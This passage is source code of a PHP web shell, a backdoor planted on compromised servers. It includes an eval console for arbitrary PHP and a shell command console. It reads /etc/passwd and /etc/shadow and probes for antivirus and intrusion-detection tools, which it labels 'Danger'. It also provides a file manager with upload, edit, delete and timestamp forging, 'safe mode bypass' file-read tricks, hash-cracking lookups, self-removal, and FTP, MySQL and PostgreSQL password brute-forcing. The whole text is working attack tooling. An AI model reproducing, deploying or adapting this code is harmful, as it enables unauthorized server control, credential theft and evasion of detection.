    $path = ex('which '.$p); 
    if(!empty($path)) 
        return $path; 
    return false; 
} 
function actionSecInfo() { 
    printHeader(); 
    echo '<h1>Server security information</h1><div class=content>'; 
    function showSecParam($n, $v) { 
        $v = trim($v); 
        if($v) { 
            echo '<span>'.$n.': </span>'; 
            if(strpos($v, "\n") === false) 
                echo $v.'<br>'; 
            else 
                echo '<pre class=ml1>'.$v.'</pre>'; 
        } 
    } 
     
    showSecParam('Server software', @getenv('SERVER_SOFTWARE')); 
    showSecParam('Disabled PHP Functions', ($GLOBALS['disable_functions'])?$GLOBALS['disable_functions']:'none'); 
    showSecParam('Open base dir', @ini_get('open_basedir')); 
    showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir')); 
    showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir')); 
    showSecParam('cURL support', function_exists('curl_version')?'enabled':'no'); 
    $temp=array(); 
    if(function_exists('mysql_get_client_info')) 
        $temp[] = "MySql (".mysql_get_client_info().")"; 
    if(function_exists('mssql_connect')) 
        $temp[] = "MSSQL"; 
    if(function_exists('pg_connect')) 
        $temp[] = "PostgreSQL"; 
    if(function_exists('oci_connect')) 
        $temp[] = "Oracle"; 
    showSecParam('Supported databases', implode(', ', $temp)); 
    echo '<br>'; 
     
    if( $GLOBALS['os'] == 'nix' ) { 
        $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl'); 
        $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja'); 
        $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); 
        showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no'); 
        showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"etc\", \"shadow\")'>[view]</a>":'no'); 
        showSecParam('OS version', @file_get_contents('/proc/version')); 
        showSecParam('Distr name', @file_get_contents('/etc/issue.net')); 
        if(!$GLOBALS['safe_mode']) { 
            echo '<br>'; 
            $temp=array(); 
            foreach ($userful as $item) 
                if(which($item)){$temp[]=$item;} 
            showSecParam('Userful', implode(', ',$temp)); 
            $temp=array(); 
            foreach ($danger as $item) 
                if(which($item)){$temp[]=$item;} 
            showSecParam('Danger', implode(', ',$temp)); 
            $temp=array(); 
            foreach ($downloaders as $item)  
                if(which($item)){$temp[]=$item;} 
            showSecParam('Downloaders', implode(', ',$temp)); 
            echo '<br/>'; 
            showSecParam('Hosts', @file_get_contents('/etc/hosts')); 
            showSecParam('HDD space', ex('df -h')); 
            showSecParam('Mount options', @file_get_contents('/etc/fstab')); 
        } 
    } else { 
        showSecParam('OS Version',ex('ver'));  
        showSecParam('Account Settings',ex('net accounts'));  
        showSecParam('User Accounts',ex('net user')); 
    } 
    echo '</div>'; 
    printFooter(); 
} 

function actionPhp() { 
    if( isset($_POST['ajax']) ) { 
        $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true; 
        ob_start(); 
        eval($_POST['p1']); 
        $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n"; 
        echo strlen($temp), "\n", $temp; 
        exit;  
    } 
    printHeader(); 
    if( isset($_POST['p2']) && ($_POST['p2'] == 'info') ) { 
        echo '<h1>PHP info</h1><div class=content>'; 
        ob_start(); 
        phpinfo(); 
        $tmp = ob_get_clean(); 
        $tmp = preg_replace('!body {.*}!msiU','',$tmp); 
        $tmp = preg_replace('!a:\w+ {.*}!msiU','',$tmp); 
        $tmp = preg_replace('!h1!msiU','h2',$tmp); 
        $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp); 
        $tmp = preg_replace('!body, td, th, h2, h2 {.*}!msiU','',$tmp); 
        echo $tmp; 
        echo '</div><br>'; 
    } 
    if(empty($_POST['ajax'])&&!empty($_POST['p1'])) 
        $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false; 
        echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);}else{g(null,null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px">'; 
    echo ' <input type=checkbox name=ajax value=1 '.($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>'; 
    if(!empty($_POST['p1'])) { 
        ob_start(); 
        eval($_POST['p1']); 
        echo htmlspecialchars(ob_get_clean()); 
    } 
    echo '</pre></div>'; 
    printFooter(); 
} 

function actionFilesMan() { 
    printHeader(); 
    echo '<h1>File manager</h1><div class=content>'; 
    if(isset($_POST['p1'])) { 
        switch($_POST['p1']) { 
            case 'uploadFile': 
                if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name'])) 
                    echo "Can't upload file!"; 
                break; 
                break; 
            case 'mkdir': 
                if(!@mkdir($_POST['p2'])) 
                    echo "Can't create new dir"; 
                break; 
            case 'delete': 
                function deleteDir($path) { 
                    $path = (substr($path,-1)=='/') ? $path:$path.'/'; 
                    $dh  = opendir($path); 
                    while ( ($item = readdir($dh) ) !== false) { 
                        $item = $path.$item; 
                        if ( (basename($item) == "..") || (basename($item) == ".") ) 
                            continue; 
                        $type = filetype($item); 
                        if ($type == "dir") 
                            deleteDir($item); 
                        else 
                            @unlink($item); 
                    } 
                    closedir($dh); 
                    rmdir($path); 
                } 
                if(is_array(@$_POST['f'])) 
                    foreach($_POST['f'] as $f) { 
                        $f = urldecode($f); 
                        if(is_dir($f)) 
                            deleteDir($f); 
                        else 
                            @unlink($f); 
                    } 
                break; 
            case 'paste': 
                if($_SESSION['act'] == 'copy') { 
                    function copy_paste($c,$s,$d){ 
                        if(is_dir($c.$s)){ 
                            mkdir($d.$s); 
                            $h = opendir($c.$s); 
                            while (($f = readdir($h)) !== false) 
                                if (($f != ".") and ($f != "..")) { 
                                    copy_paste($c.$s.'/',$f, $d.$s.'/'); 
                                } 
                        } elseif(is_file($c.$s)) { 
                            @copy($c.$s, $d.$s); 
                        } 
                    } 
                    foreach($_SESSION['f'] as $f) 
                        copy_paste($_SESSION['cwd'],$f, $GLOBALS['cwd']);                     
                } elseif($_SESSION['act'] == 'move') { 
                    function move_paste($c,$s,$d){ 
                        if(is_dir($c.$s)){ 
                            mkdir($d.$s); 
                            $h = opendir($c.$s); 
                            while (($f = readdir($h)) !== false) 
                                if (($f != ".") and ($f != "..")) { 
                                    copy_paste($c.$s.'/',$f, $d.$s.'/'); 
                                } 
                        } elseif(is_file($c.$s)) { 
                            @copy($c.$s, $d.$s); 
                        } 
                    } 
                    foreach($_SESSION['f'] as $f) 
                        @rename($_SESSION['cwd'].$f, $GLOBALS['cwd'].$f); 
                } 
                unset($_SESSION['f']); 
                break; 
            default: 
                if(!empty($_POST['p1']) && (($_POST['p1'] == 'copy')||($_POST['p1'] == 'move')) ) { 
                    $_SESSION['act'] = @$_POST['p1']; 
                    $_SESSION['f'] = @$_POST['f']; 
                    foreach($_SESSION['f'] as $k => $f) 
                        $_SESSION['f'][$k] = urldecode($f); 
                    $_SESSION['cwd'] = @$_POST['c']; 
                } 
                break; 
        } 
        echo '<script>document.mf.p1.value="";document.mf.p2.value="";</script>'; 
    } 
    $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']); 
    if($dirContent === false) {    echo 'Can\'t open this folder!'; return;    }
    global $sort; 
    $sort = array('name', 1); 
    if(!empty($_POST['p1'])) { 
        if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match)) 
            $sort = array($match[1], (int)$match[2]); 
    } 
?> 
<script> 
    function sa() { 
        for(i=0;i<document.files.elements.length;i++) 
            if(document.files.elements[i].type == 'checkbox') 
                document.files.elements[i].checked = document.files.elements[0].checked; 
    } 
</script> 
<table width='100%' class='main' cellspacing='0' cellpadding='2'> 
<form name=files method=post> 
<?php 
    echo "<tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>"; 
    $dirs = $files = $links = array(); 
    $n = count($dirContent); 
    for($i=0;$i<$n;$i++) { 
        $ow = @posix_getpwuid(@fileowner($dirContent[$i])); 
        $gr = @posix_getgrgid(@filegroup($dirContent[$i])); 
        $tmp = array('name' => $dirContent[$i], 
                     'path' => $GLOBALS['cwd'].$dirContent[$i], 
                     'modify' => date('Y-m-d H:i:s',@filemtime($GLOBALS['cwd'].$dirContent[$i])), 
                     'perms' => viewPermsColor($GLOBALS['cwd'].$dirContent[$i]),
                     'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]), 
                     'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]), 
                     'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i]) 
                    ); 
        if(@is_file($GLOBALS['cwd'].$dirContent[$i])) 
            $files[] = array_merge($tmp, array('type' => 'file')); 
        elseif(@is_link($GLOBALS['cwd'].$dirContent[$i])) 
            $links[] = array_merge($tmp, array('type' => 'link')); 
        elseif(@is_dir($GLOBALS['cwd'].$dirContent[$i])&& ($dirContent[$i] != ".")) 
            $dirs[] = array_merge($tmp, array('type' => 'dir')); 
    } 
    $GLOBALS['sort'] = $sort; 
    function cmp($a, $b) { 
        if($GLOBALS['sort'][0] != 'size') 
            return strcmp($a[$GLOBALS['sort'][0]], $b[$GLOBALS['sort'][0]])*($GLOBALS['sort'][1]?1:-1); 
        else 
            return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1); 
    } 
    usort($files, "cmp"); 
    usort($dirs, "cmp"); 
    usort($links, "cmp"); 
    $files = array_merge($dirs, $links, $files); 
    $l = 0; 
    foreach($files as $f) { 
        echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');"><b>[ '.htmlspecialchars($f['name']).' ]</b>').'</a></td><td>'.(($f['type']=='file')?viewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms'] 
            .'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>'; 
        $l = $l?0:1; 
    } 
    ?> 
    <tr><td colspan=7> 
    <input type=hidden name=a value='FilesMan'> 
    <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'> 
    <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'> 
    <select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option><?php if(!empty($_SESSION['act'])&&@count($_SESSION['f'])){?><option value='paste'>Paste</option><?php }?></select>&nbsp;<input type="submit" value=">>"></td></tr> 
    </form></table></div> 
    <?php 
    printFooter(); 
} 

function actionStringTools() { 
    if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}} 
    if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}} 
    if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= dechex(ord($p[$i]));return strtoupper($r);}} 
    if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}} 
     
    if(isset($_POST['ajax'])) { 
        $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true; 
        ob_start(); 
        if(function_exists($_POST['p1'])) 
            echo $_POST['p1']($_POST['p2']); 
        $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n"; 
        echo strlen($temp), "\n", $temp; 
        exit; 
    } 
    printHeader(); 
    echo '<h1>String conversions</h1><div class=content>'; 
    $stringTools = array( 
        'Base64 encode' => 'base64_encode', 
        'Base64 decode' => 'base64_decode', 
        'Url encode' => 'urlencode', 
        'Url decode' => 'urldecode', 
        'Full urlencode' => 'full_urlencode', 
        'md5 hash' => 'md5', 
        'sha1 hash' => 'sha1', 
        'crypt' => 'crypt', 
        'CRC32' => 'crc32', 
        'ASCII to HEX' => 'ascii2hex', 
        'HEX to ASCII' => 'hex2ascii', 
        'HEX to DEC' => 'hexdec', 
        'HEX to BIN' => 'hex2bin', 
        'DEC to HEX' => 'dechex', 
        'DEC to BIN' => 'decbin', 
        'BIN to HEX' => 'bin2hex', 
        'BIN to DEC' => 'bindec',         
        'String to lower case' => 'strtolower', 
        'String to upper case' => 'strtoupper', 
        'Htmlspecialchars' => 'htmlspecialchars', 
        'String length' => 'strlen', 
    ); 
    if(empty($_POST['ajax'])&&!empty($_POST['p1'])) 
        $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false; 
    echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>"; 
    foreach($stringTools as $k => $v) 
        echo "<option value='".htmlspecialchars($v)."'>".$k."</option>"; 
        echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 ".($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".htmlspecialchars(@$_POST['p2'])."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>"; 
    if(!empty($_POST['p1'])) { 
        if(function_exists($_POST['p1'])) 
        echo htmlspecialchars($_POST['p1']($_POST['p2'])); 
    } 
    echo"</pre></div>"; 
    ?> 
    <br><h1>Search for hash:</h1><div class=content> 
        <form method='post' target='_blank' name="hf"> 
            <input type="text" name="hash" style="width:200px;"><br> 
            <input type="button" value="hashcrack.com" onclick="document.hf.action='http://www.hashcrack.com/index.php';document.hf.submit()"><br> 
            <input type="button" value="milw0rm.com" onclick="document.hf.action='http://www.milw0rm.com/cracker/search.php';document.hf.submit()"><br> 
            <input type="button" value="hashcracking.info" onclick="document.hf.action='https://hashcracking.info/index.php';document.hf.submit()"><br> 
            <input type="button" value="md5.rednoize.com" onclick="document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()"><br> 
            <input type="button" value="md5decrypter.com" onclick="document.hf.action='http://www.md5decrypter.com/';document.hf.submit()"><br> 
        </form> 
    </div> 
    <?php 
    printFooter(); 
} 

function actionFilesTools() { 
    if( isset($_POST['p1']) ) 
        $_POST['p1'] = urldecode($_POST['p1']); 
    if(@$_POST['p2']=='download') { 
        if(is_file($_POST['p1']) && is_readable($_POST['p1'])) { 
            ob_start("ob_gzhandler", 4096); 
            header("Content-Disposition: attachment; filename=".basename($_POST['p1'])); 
            if (function_exists("mime_content_type")) { 
                $type = @mime_content_type($_POST['p1']); 
                header("Content-Type: ".$type); 
            } 
            $fp = @fopen($_POST['p1'], "r"); 
            if($fp) { 
                while(!@feof($fp)) 
                    echo @fread($fp, 1024); 
                fclose($fp); 
            } 
        } elseif(is_dir($_POST['p1']) && is_readable($_POST['p1'])) { 

        } 
        exit; 
    } 
    if( @$_POST['p2'] == 'mkfile' ) { 
        if(!file_exists($_POST['p1'])) { 
            $fp = @fopen($_POST['p1'], 'w'); 
            if($fp) { 
                $_POST['p2'] = "edit"; 
                fclose($fp); 
            } 
        } 
    } 
    printHeader(); 
    echo '<h1>File tools</h1><div class=content>'; 
    if( !file_exists(@$_POST['p1']) ) { 
        echo 'File not exists'; 
        printFooter(); 
        return; 
    } 
    $uid = @posix_getpwuid(@fileowner($_POST['p1'])); 
    $gid = @posix_getgrgid(@fileowner($_POST['p1'])); 
    echo '<span>Name:</span> '.htmlspecialchars($_POST['p1']).' <span>Size:</span> '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.viewPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>'; 
    echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>'; 
    if( empty($_POST['p2']) ) 
        $_POST['p2'] = 'view'; 
    if( is_file($_POST['p1']) ) 
        $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch'); 
    else 
        $m = array('Chmod', 'Rename', 'Touch'); 
    foreach($m as $v) 
        echo '<a href=# onclick="g(null,null,null,\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> '; 
    echo '<br><br>'; 
    switch($_POST['p2']) { 
        case 'view': 
            echo '<pre class=ml1>'; 
            $fp = @fopen($_POST['p1'], 'r'); 
            if($fp) { 
                while( !@feof($fp) ) 
                    echo htmlspecialchars(@fread($fp, 1024)); 
                @fclose($fp); 
            } 
            echo '</pre>'; 
            break; 
        case 'highlight': 
            if( is_readable($_POST['p1']) ) { 
                echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">'; 
                $code = highlight_file($_POST['p1'],true); 
                echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>'; 
            } 
            break; 
        case 'chmod': 
            if( !empty($_POST['p3']) ) { 
                $perms = 0; 
                for($i=strlen($_POST['p3'])-1;$i>=0;--$i) 
                    $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1)); 
                if(!@chmod($_POST['p1'], $perms)) 
                    echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>'; 
                else 
                    die('<script>g(null,null,null,null,"")</script>'); 
            } 
            echo '<form onsubmit="g(null,null,null,null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>'; 
            break; 
        case 'edit': 
            if( !is_writable($_POST['p1'])) { 
                echo 'File isn\'t writeable'; 
                break; 
            } 
            if( !empty($_POST['p3']) ) { 
                @file_put_contents($_POST['p1'],$_POST['p3']); 
                echo 'Saved!<br><script>document.mf.p3.value="";</script>'; 
            } 
            echo '<form onsubmit="g(null,null,null,null,this.text.value);return false;"><textarea name=text class=bigarea>'; 
            $fp = @fopen($_POST['p1'], 'r'); 
            if($fp) { 
                while( !@feof($fp) ) 
                    echo htmlspecialchars(@fread($fp, 1024)); 
                @fclose($fp); 
            } 
            echo '</textarea><input type=submit value=">>"></form>'; 
            break; 
        case 'hexdump': 
            $c = @file_get_contents($_POST['p1']); 
            $n = 0; 
            $h = array('00000000<br>','',''); 
            $len = strlen($c); 
            for ($i=0; $i<$len; ++$i) { 
                $h[1] .= sprintf('%02X',ord($c[$i])).' '; 
                switch ( ord($c[$i]) ) { 
                    case 0:  $h[2] .= ' '; break; 
                    case 9:  $h[2] .= ' '; break; 
                    case 10: $h[2] .= ' '; break; 
                    case 13: $h[2] .= ' '; break; 
                    default: $h[2] .= $c[$i]; break; 
                } 
                $n++; 
                if ($n == 32) { 
                    $n = 0; 
                    if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';} 
                    $h[1] .= '<br>'; 
                    $h[2] .= "\n"; 
                } 
             } 
            echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>'; 
            break; 
        case 'rename': 
            if( !empty($_POST['p3']) ) { 
                if(!@rename($_POST['p1'], $_POST['p3'])) 
                    echo 'Can\'t rename!<br><script>document.mf.p3.value="";</script>'; 
                else 
                    die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>'); 
            } 
            echo '<form onsubmit="g(null,null,null,null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>'; 
            break; 
        case 'touch': 
            if( !empty($_POST['p3']) ) { 
                $time = strtotime($_POST['p3']); 
                if($time) { 
                    if(@touch($_POST['p1'],$time,$time)) 
                        die('<script>g(null,null,null,null,"")</script>'); 
                    else { 
                        echo 'Fail!<script>document.mf.p3.value="";</script>'; 
                    } 
                } else echo 'Bad time format!<script>document.mf.p3.value="";</script>'; 
            } 
            echo '<form onsubmit="g(null,null,null,null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>'; 
            break; 
        case 'mkfile': 
             
            break; 
    } 
    echo '</div>'; 
    printFooter(); 
} 

function actionSafeMode() { 
    $temp=''; 
    ob_start(); 
    switch($_POST['p1']) { 
        case 1: 
            $temp=@tempnam($test, 'cx'); 
            if(@copy("compress.zlib://".$_POST['p2'], $temp)){ 
                echo @file_get_contents($temp); 
                unlink($temp); 
            } else 
                echo 'Sorry... Can\'t open file'; 
            break; 
        case 2: 
            $files = glob($_POST['p2'].'*'); 
            if( is_array($files) ) 
                foreach ($files as $filename) 
                    echo $filename."\n"; 
            break; 
        case 3: 
            $ch = curl_init("file://".$_POST['p2']."\x00".SELF_PATH); 
            curl_exec($ch); 
            break; 
        case 4: 
            ini_restore("safe_mode"); 
            ini_restore("open_basedir"); 
            include($_POST['p2']); 
            break; 
        case 5: 
            for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) { 
                $uid = @posix_getpwuid($_POST['p2']); 
                if ($uid) 
                    echo join(':',$uid)."\n"; 
            } 
            break; 
        case 6: 
            if(!function_exists('imap_open'))break; 
            $stream = imap_open($_POST['p2'], "", ""); 
            if ($stream == FALSE) 
                break; 
            echo imap_body($stream, 1); 
            imap_close($stream); 
            break; 
    } 
    $temp = ob_get_clean(); 
    printHeader(); 
    echo '<h1>Safe mode bypass</h1><div class=content>'; 
    echo '<span>Copy (read file)</span><form onsubmit=\'g(null,null,"1",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Glob (list dir)</span><form onsubmit=\'g(null,null,"2",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Curl (read file)</span><form onsubmit=\'g(null,null,"3",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Ini_restore (read file)</span><form onsubmit=\'g(null,null,"4",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form><br><br><span>Imap_open (read file)</span><form onsubmit=\'g(null,null,"6",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form>'; 
    if($temp) 
        echo '<pre class="ml1" style="margin-top:5px" id="Output">'.$temp.'</pre>'; 
    echo '</div>'; 
    printFooter(); 
} 

function actionConsole() { 
    if(isset($_POST['ajax'])) { 
        $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true; 
        ob_start(); 
        echo "document.cf.cmd.value='';\n"; 
        $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".ex($_POST['p1']),"\n\r\t\\'\0")); 
        if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match))    { 
            if(@chdir($match[1])) { 
                $GLOBALS['cwd'] = @getcwd(); 
                echo "document.mf.c.value='".$GLOBALS['cwd']."';"; 
            } 
        } 
        echo "document.cf.output.value+='".$temp."';"; 
        echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;"; 
        $temp = ob_get_clean(); 
        echo strlen($temp), "\n", $temp; 
        exit; 
    } 
    printHeader(); 
?> 
<script> 
if(window.Event) window.captureEvents(Event.KEYDOWN); 
var cmds = new Array(""); 
var cur = 0; 
function kp(e) { 
    var n = (window.Event) ? e.which : e.keyCode; 
    if(n == 38) { 
        cur--; 
        if(cur>=0) 
            document.cf.cmd.value = cmds[cur]; 
        else 
            cur++; 
    } else if(n == 40) { 
        cur++; 
        if(cur < cmds.length) 
            document.cf.cmd.value = cmds[cur]; 
        else 
            cur--; 
    } 
} 
function add(cmd) { 
    cmds.pop(); 
    cmds.push(cmd); 
    cmds.push(""); 
    cur = cmds.length-1; 
} 
</script> 
<?php 
    echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(document.cf.cmd.value==\'clear\'){document.cf.output.value=\'\';document.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value);}else{g(null,null,this.cmd.value);} return false;"><select name=alias>'; 
    foreach($GLOBALS['aliases'] as $n => $v) { 
        if($v == '') { 
            echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>'; 
            continue; 
        } 
        echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>'; 
    } 
    if(empty($_POST['ajax'])&&!empty($_POST['p1'])) 
        $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false; 
    echo '</select><input type=button onclick="add(document.cf.alias.value);if(document.cf.ajax.checked){a(null,null,document.cf.alias.value);}else{g(null,null,document.cf.alias.value);}" value=">>"> <input type=checkbox name=ajax value=1 '.($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX<br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>'; 
    if(!empty($_POST['p1'])) { 
        echo htmlspecialchars("$ ".$_POST['p1']."\n".ex($_POST['p1'])); 
    } 
    echo '</textarea><input type=text name=cmd style="border-top:0;width:100%;margin:0;" onkeydown="kp(event);">'; 
    echo '</form></div><script>document.cf.cmd.focus();</script>'; 
    printFooter(); 
} 

function actionLogout() { 
    unset($_SESSION[md5($_SERVER['HTTP_HOST'])]); 
    echo 'bye!'; 
} 

function actionSelfRemove() { 
    printHeader(); 
    if($_POST['p1'] == 'yes') { 
        if(@unlink(SELF_PATH)) 
            die('Shell has been removed'); 
        else 
            echo 'unlink error!'; 
    } 
    echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>'; 
    printFooter(); 
} 

function actionBruteforce() { 
    printHeader(); 
    if( isset($_POST['proto']) ) { 
        echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'<br>'; 
        if( $_POST['proto'] == 'ftp' ) { 
            function bruteForce($ip,$port,$login,$pass) { 
                $fp = @ftp_connect($ip, $port?$port:21); 
                if(!$fp) return false; 
                $res = @ftp_login($fp, $login, $pass); 
                @ftp_close($fp); 
                return $res; 
            } 
        } elseif( $_POST['proto'] == 'mysql' ) { 
            function bruteForce($ip,$port,$login,$pass) { 
                $res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass); 
                @mysql_close($res); 
                return $res; 
            } 
        } elseif( $_POST['proto'] == 'pgsql' ) { 
            function bruteForce($ip,$port,$login,$pass) { 
                $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=''"; 
                $res = @pg_connect($server[0].':'.$server[1]?$server[1]:5432, $login, $pass); 
                @pg_close($res); 
                return $res; 
            } 
        } 
        $success = 0; 
        $attempts = 0; 
        $server = explode(":", $_POST['server']); 
        if($_POST['type'] == 1) { 
            $temp = @file('/etc/passwd'); 
            if( is_array($temp) ) 
                foreach($temp as $line) { 
                    $line = explode(":", $line); 
                    ++$attempts; 
                    if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) { 
                        $success++; 
                        echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>'; 
                    } 
                    if(@$_POST['reverse']) { 
                        $tmp = ""; 
                        for($i=strlen($line[0])-1; $i>=0; --$i) 
                            $tmp .= $line[0][$i]; 
